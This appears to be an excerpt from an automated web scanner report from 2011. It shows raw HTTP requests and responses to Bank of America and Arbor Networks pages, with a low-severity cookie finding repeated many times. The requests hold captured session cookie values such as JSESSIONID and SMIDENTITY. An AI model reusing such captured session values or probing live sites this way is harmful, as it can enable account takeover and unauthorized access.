GET /index.php HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /register.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /adtrack/index.cgi?adlink=000309029q890000g161 HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:30 GMT Content-length: 0 P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-cookie: TRACKING_CODE=000309029q890000g161; path=/; expires=Monday, 01-Aug-2011 23:59:59 GMT Set-cookie: PROMO=000309029q890000g161; path=/; Location: https://www.bankofamerica.com/ProcessUser.do?section=onlinebanking_enroll&adlink=000309029q890000g161 Connection: close Set-Cookie: BIGipServerngen-www.80=430356139.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /careers/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:06:00 GMT Content-type: magnus-internal/cold-fusion Location: http://careers.bankofamerica.com Connection: close Set-Cookie: BIGipServerngen-www.80=3871717035.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /creditcards/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 301 Moved permanently Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:05:50 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Location: https://www4.bankofamerica.com/credit-cards/cardoverview.action?context_id=overview_page Page-Completion-Status: Normal Set-Cookie: TRACKING_CODE=; path=/; Connection: close Set-Cookie: BIGipServerngen-www.80=3049633451.20480.0000; path=/
<!--i2a business unit tracking code--> <script LANGUAGE="JavaScript" type="text/javascript"> var ic_bu = "credit+cards"; </script>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /creditcards/index.cfm?template=manage_card&RequestTimeout=120 HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:05:51 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: CCPATH=Affiliate; path=/; domain=.bankofamerica.com; Set-Cookie: CONTEXT=; expires=Tue, 04-Jan-2011 01:05:49 GMT; path=/; Set-Cookie: TRACKING_CODE=; path=/; Connection: close Set-Cookie: BIGipServerngen-www.80=3167139499.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /deposits/checksave/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:05:31 GMT Content-type: magnus-internal/cold-fusion Location: http://www.bankofamerica.com/state.cgi?section=generic&destination=nba/deposits/checksave/index.cfm?template=overview&context=en_US&ch_bag=&sa_bag=&cd_bag= Connection: close Set-Cookie: BIGipServerngen-www.80=3049633451.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /deposits/checksave/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:36 GMT Content-type: magnus-internal/cold-fusion Location: http://www.bankofamerica.com/state.cgi?section=generic&destination=nba/deposits/checksave/index.cfm?template=overview&context=en_US&ch_bag=&sa_bag=&cd_bag= Connection: close Set-Cookie: BIGipServerngen-www.80=430356139.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /feesandprocesses/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:05:58 GMT Content-type: magnus-internal/cold-fusion Location: http://feesandprocesses.bankofamerica.com/ Connection: close Set-Cookie: BIGipServerngen-www.80=969324203.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /financialtools/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:05:59 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Location: http://learn.bankofamerica.com Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=482784939.20480.0000; path=/
<!-- i2a business unit tracking code --> <script LANGUAGE="JavaScript"> var ic_bu = "financialtools"; </script> <!-- i2a business unit tracking code -->
<!-- i2a general tracking code --> <sc ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:05:20 GMT Content-type: text/html P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: BIGipServerngen-www.80=2756032171.20480.0000; path=/ Content-Length: 19150
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Description" content="Plea ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /findit/locator.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:05:55 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Location: http://locators.bankofamerica.com/locator/locator Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=1455863467.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /help/equalhousing.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:05:17 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=1657190059.20480.0000; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /help/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:05:16 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; expires=Wed, 03-Aug-2011 00:00:00 GMT; path=/; domain=.bankofamerica.com; Set-Cookie: SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN; path=/; domain=.bankofamerica.com; Connection: close Set-Cookie: BIGipServerngen-www.80=3049633451.20480.0000; path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 404 Not found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:35:46 GMT Content-type: text/html P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: BIGipServerngen-www.80=3158750891.20480.0000; path=/ Content-Length: 19150
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Description" content="Plea ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
